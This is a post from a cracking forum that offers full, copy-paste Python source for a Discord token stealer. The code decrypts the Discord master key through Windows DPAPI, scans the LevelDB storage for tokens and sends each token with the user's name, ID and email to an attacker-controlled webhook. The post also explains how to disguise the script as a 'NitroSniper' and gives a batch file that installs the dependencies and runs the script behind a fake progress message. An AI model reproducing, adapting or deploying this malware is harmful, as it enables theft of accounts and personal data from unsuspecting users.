ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Cracking Tutorials

CODE FOR STEALING DISCORD TOKENS - Open source HQ

Submitted by ProjectMajin at 13-06-2026, 10:39 PM


CODE FOR STEALING DISCORD TOKENS - Open source HQ
196 Views
ProjectMajin's Avatar'
ProjectMajin
Offline
#1
JUST LEAVE A LIKE AS A THANK YOU.

CODE FOR COPY PASTE:
 
Code:
import os
import json
import base64
import re
import requests
from Crypto.Cipher import AES
import ctypes
from ctypes import wintypes

WEBHOOK_URL = "" #PASTE HERE YOU DISCORD WEBHOOK

def send(tokens):
    if not tokens or not WEBHOOK_URL or "DEINE_ID" in WEBHOOK_URL:
        return
  
    try:
        for token in tokens:
            headers = {'Authorization': token, 'User-Agent': 'Mozilla/5.0'}
            try:
                resp = requests.get('https://discord.com/api/v9/users/@me', headers=headers, timeout=5)
                if resp.status_code == 200:
                    user = resp.json()
                    username = f"{user.get('username')}#{user.get('discriminator')}"
                    user_id = user.get('id')
                    email = user.get('email', 'None')
                else:
                    username = "Unknown (invalid)"
                    user_id = "Unknown"
                    email = "Unknown"
            except:
                username = "Unknown (invalid)"
                user_id = "Unknown"
                email = "Unknown"
          
            embed = {
                "title": " Discord Token Extraction",
                "color": 0x5865F2,
                "fields": [
                    {"name": "User", "value": username, "inline": True},
                    {"name": "User ID", "value": user_id, "inline": True},
                    {"name": "Email", "value": email, "inline": False},
                    {"name": "Token", "value": f"||{token}||", "inline": False}
                ],
                "footer": {"text": "a MAJIN project"}
            }
          
            requests.post(WEBHOOK_URL, json={"embeds": [embed]}, timeout=5)
          
    except:
        pass

def valid(token):
    headers = {'Authorization': token, 'User-Agent': 'Mozilla/5.0'}
    try:
        response = requests.get('https://discord.com/api/v9/users/@me', headers=headers, timeout=5)
        return response.status_code == 200
    except:
        return False

username = os.environ.get('USERNAME')

LEVELDB_PATH = f"C:\\Users\\{username}\\AppData\\Roaming\\discord\\Local Storage\\leveldb"
LOCAL_STATE_PATH = f"C:\\Users\\{username}\\AppData\\Roaming\\discord\\Local State"

class DATA_BLOB(ctypes.Structure):
    _fields_ = [('cbData', wintypes.DWORD), ('pbData', ctypes.POINTER(ctypes.c_char))]

def crypt_unprotect_data(encrypted_data):
    crypt32 = ctypes.windll.crypt32
    kernel32 = ctypes.windll.kernel32
    blob_in = DATA_BLOB()
    blob_in.cbData = len(encrypted_data)
    blob_in.pbData = ctypes.cast(encrypted_data, ctypes.POINTER(ctypes.c_char))
    blob_out = DATA_BLOB()
    if crypt32.CryptUnprotectData(ctypes.byref(blob_in), None, None, None, None, 0, ctypes.byref(blob_out)):
        result = ctypes.string_at(blob_out.pbData, blob_out.cbData)
        kernel32.LocalFree(blob_out.pbData)
        return result
    return None

def get_master_key():
    with open(LOCAL_STATE_PATH, 'r', encoding='utf-8') as f:
        local_state = json.load(f)
    encrypted_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
    encrypted_key = encrypted_key[5:]
    return crypt_unprotect_data(encrypted_key)

def decrypt_token(encrypted_token, master_key):
    encrypted_data = base64.b64decode(encrypted_token)
    nonce = encrypted_data[3:15]
    ciphertext = encrypted_data[15:-16]
    tag = encrypted_data[-16:]
    cipher = AES.new(master_key, AES.MODE_GCM, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag).decode('utf-8')

def scan_for_tokens(master_key):
    tokens = []
    pattern = rb'dQw4w9WgXcQ:[A-Za-z0-9+/=]+'
  
    for file_name in os.listdir(LEVELDB_PATH):
        if file_name.endswith('.ldb') or file_name.endswith('.log'):
            with open(os.path.join(LEVELDB_PATH, file_name), 'rb') as f:
                content = f.read()
            for match in re.findall(pattern, content):
                encrypted_part = match.split(b':')[1].decode('utf-8')
                try:
                    token = decrypt_token(encrypted_part, master_key)
                    if token and '.' in token and len(token) > 50:
                        if valid(token):
                            tokens.append(token)
                except:
                    pass
    return tokens

if __name__ == "__main__":
    if not os.path.exists(LEVELDB_PATH):
        exit(1)
  
    if not os.path.exists(LOCAL_STATE_PATH):
        exit(1)
  
    master_key = get_master_key()
    tokens = scan_for_tokens(master_key)
  
    if tokens:
        send(tokens)
Code:
pip install pycryptodome
pip install requests
HOW DOES IT WORK:
For the script to work, the user must have "requests" and "pycryptodome" installed. Discord tokens are stored in the LevelDB file. The "master key" is located in the "Local State" file within the Discord directory; this key is decrypted, and the LevelDB file is then searched for tokens, which are subsequently sent to you via a webhook.

HOW TO HIDE IT:
Release the script under a different guise—for example, pretend it’s a "NitroSniper" or something equally silly. To get the user to install the necessary dependencies, you can create a file named "start.bat" containing the commands pip install pycryptodome, pip install requests, and finally python file.py (replacing "file.py" with the actual filename). This batch file automatically installs the requirements and launches the script; while it extracts the tokens, you could display a message like "Checking if everything installed correctly." Of course, there are various ways to disguise the script—feel free to join my Discord for more info.

OUTPUT:
[img]blob:https://imgur.com/ec65ca1b-108a-40ae-9dfa-c7eae223aadf[/img][Image: 7FDGLtD.png]
0
Reply



Users browsing this thread: